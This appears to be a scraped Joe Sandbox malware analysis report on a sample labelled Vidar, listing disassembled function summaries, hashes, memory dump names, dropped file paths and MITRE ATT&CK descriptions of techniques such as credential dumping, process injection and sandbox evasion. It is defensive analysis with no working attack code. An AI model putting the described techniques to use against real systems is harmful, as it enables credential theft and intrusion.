API String ID: 624084870-1403004172
Opcode ID: 361a08b5321e63aa1cf9d7b7f455b4fc61bcb1b002c8dbed761fb7f92a26d71d
Instruction ID: ce2781f64ad32955cd7a301c614d7f08688afd680bc77e67af6bd94ac39aae8c
Opcode Fuzzy Hash: 361a08b5321e63aa1cf9d7b7f455b4fc61bcb1b002c8dbed761fb7f92a26d71d
Instruction Fuzzy Hash: 3601B175641219BBCB08EBA4CC51EFE7778FF86361B000A19A832972C2EB71580CD751

Function 00A52525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Part of subcall function 00A545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A54620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00A52593

Strings

ComboBox, xrefs: 00A52532
ListBox, xrefs: 00A5255D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 3b14ba54270ef7710f9f3b75cc7497b72ed788c1fe79c3b6b5c66a6186601fe0
Instruction ID: ec85ce5501396c1e46c97254d5894a28b915b617d0732be494b8a7390e1f3072
Opcode Fuzzy Hash: 3b14ba54270ef7710f9f3b75cc7497b72ed788c1fe79c3b6b5c66a6186601fe0
Instruction Fuzzy Hash: 460184B56411087BCB04EB90C962FFE77A8AF96342F5000196D02A32C1EB659E0CD7B1

Function 00A525A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Part of subcall function 00A545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A54620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00A52615

Strings

ComboBox, xrefs: 00A525B6
ListBox, xrefs: 00A525E1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ccd4b242a4d22a0e861996154a4d80b3dda59d911de7b7133793a8c140e0fa91
Instruction ID: 4df2eeb1f787d68a44baba1054056f912af69a55396c3516766f08649cc3a350
Opcode Fuzzy Hash: ccd4b242a4d22a0e861996154a4d80b3dda59d911de7b7133793a8c140e0fa91
Instruction Fuzzy Hash: 4A01A2B5A4010876CB05EBA0C901FFE77B8EB46341F500025BD02A3282EA758E0CD7B2

Function 00A526B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Part of subcall function 00A545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A54620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00A52720

Strings

ComboBox, xrefs: 00A526C2
ListBox, xrefs: 00A526ED

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: f7c165a258731e103dab219cc45d5e2f9fa72eb6519dd3352689cbf6a5222cab
Instruction ID: b827cbd5d31fca9318a2800e975545bb4ec6816c6245739abcc944e5b287aaa4
Opcode Fuzzy Hash: f7c165a258731e103dab219cc45d5e2f9fa72eb6519dd3352689cbf6a5222cab
Instruction Fuzzy Hash: 91F081B5A8121876DB04E7A4CC51FFE777CBF4A795F400915B922A32C2EB71580CC361

Function 00A51461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A5146F

Strings

AutoIt, xrefs: 00A51463
Error allocating memory., xrefs: 00A51468

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 424b5e411dce576b2058048ef25bdb7926a20a4c0b552bbde6f8148d9355f0fe
Instruction ID: 2cc4f811158e2e9f10bf855774e5c7867364c7f6dbcd12355e15a9ab815e2ab5
Opcode Fuzzy Hash: 424b5e411dce576b2058048ef25bdb7926a20a4c0b552bbde6f8148d9355f0fe
Instruction Fuzzy Hash: 4BE0487228471836D6143794AD03FD57B859F05B65F11492AF758554C34EE624D04399

Function 00A110B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00A0FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A110E2,?,?,?,009F100A), ref: 00A0FAD9

IsDebuggerPresent.KERNEL32(?,?,?,009F100A), ref: 00A110E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,009F100A), ref: 00A110F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A110F0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 4d75d8ec64a1ee89671d733dea9e482bbed0c9dfd6c92636f7f4d2c87c993fde
Instruction ID: 3f6d893dcb46541c7e027cefbfe62ba07b84c0c0bc17c2f46897f491ff7f6d08
Opcode Fuzzy Hash: 4d75d8ec64a1ee89671d733dea9e482bbed0c9dfd6c92636f7f4d2c87c993fde
Instruction Fuzzy Hash: 3AE065706007518FD730DF68E904B82BBE4AB04340F048E2CE986C6691EBB4E884CBA1

Function 00A639D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00A639F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00A63A05

Strings

aut, xrefs: 00A639F9

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 7adb43496fdbf6f4550dadfb9830868d1c3a84f7780d9250bb55a5539f1999e3
Instruction ID: 9ecff8375108308fb742d0f2e834a2a71f4df5653c3847da8fa766f59af7b0b0
Opcode Fuzzy Hash: 7adb43496fdbf6f4550dadfb9830868d1c3a84f7780d9250bb55a5539f1999e3
Instruction Fuzzy Hash: 16D05E7250032877DA60E7A49C0EFCB7F6CEB44760F0006A1BA55920D1EAF0DA86CB90

Function 00A82DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A82DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A82DDB

Part of subcall function 00A5F292: Sleep.KERNEL32 ref: 00A5F30A

Strings

Shell_TrayWnd, xrefs: 00A82DC1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c455642d7b13c73b71e913709831c946d607d852bdb3c5e6514bb615cb4404de
Instruction ID: d4cde30d511bc950cb9dc967863a119bd01075ccfbf45b958c8c8f3838de23b9
Opcode Fuzzy Hash: c455642d7b13c73b71e913709831c946d607d852bdb3c5e6514bb615cb4404de
Instruction Fuzzy Hash: F6D0A9353A4300BAE228F3B0AD0BFDA2B14AF40B10F2008217209AA0C0C8E068428B40

Function 00A82DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A82E08
PostMessageW.USER32(00000000), ref: 00A82E0F

Part of subcall function 00A5F292: Sleep.KERNEL32 ref: 00A5F30A

Strings

Shell_TrayWnd, xrefs: 00A82E01

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b8d5bb336554f564d117ecad2ec120349ad710304650f4d7cda032556d778959
Instruction ID: a1a3bce77c0412bac10c7de7570384c1341694163ba0642b5db820d324b610c2
Opcode Fuzzy Hash: b8d5bb336554f564d117ecad2ec120349ad710304650f4d7cda032556d778959
Instruction Fuzzy Hash: B0D0A9313913007AE228F3B0AD0BFCA2B14AB40B10F6008217205AA0C0C8E068428B44

Function 00A2C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00A2C213
GetLastError.KERNEL32 ref: 00A2C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A2C27C

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: edfe8212d5543d27e4661e7d69098771ffb1e08bf023af4c35c5a7915650cbe4
Instruction ID: 86f6e90ebd3938d49826a1ed889b220f62a0bb4ecafa488618fd5cafdc41b934
Opcode Fuzzy Hash: edfe8212d5543d27e4661e7d69098771ffb1e08bf023af4c35c5a7915650cbe4
Instruction Fuzzy Hash: 21419130600665EFDB25AFE9E844BEE7BA5EF12720F244179E855AB1A1DF309D01C760

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QIo3SytSZA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\WBIEKNG4E3WB\5XT00ZUAA

C:\ProgramData\WBIEKNG4E3WB\79R16X

C:\ProgramData\WBIEKNG4E3WB\8QQ9HV

C:\ProgramData\WBIEKNG4E3WB\9HVAI5

C:\ProgramData\WBIEKNG4E3WB\AS268YUKF

C:\ProgramData\WBIEKNG4E3WB\CBASRI

C:\ProgramData\WBIEKNG4E3WB\JMGVK6

C:\ProgramData\WBIEKNG4E3WB\P8QIEK

C:\ProgramData\WBIEKNG4E3WB\ZU3O8G

Windows Analysis Report
QIo3SytSZA.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

